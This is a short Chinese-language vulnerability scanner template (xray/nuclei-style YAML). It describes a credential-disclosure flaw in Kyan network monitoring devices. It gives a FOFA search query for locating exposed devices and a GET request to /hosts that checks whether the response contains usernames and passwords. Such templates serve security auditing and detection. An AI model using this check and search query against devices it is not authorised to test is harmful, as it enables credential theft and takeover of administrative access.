漏洞描述
Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限
fofa: title="platform - Login"
id: kyan-network-monitoring-account-password-leakage
info:
name: Kyan 网络监控设备 hosts 账号密码泄露漏洞
author: B1anda0
severity: high
verified: true
description: |-
Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限
fofa: title="platform - Login"
tags: kyan,disclosure
created: 2023/10/29
rules:
r0:
request:
method: GET
path: /hosts
expression: response.status == 200 && response.body.bcontains(b'UserName=') && response.body.bcontains(b'Password=')
expression: r0()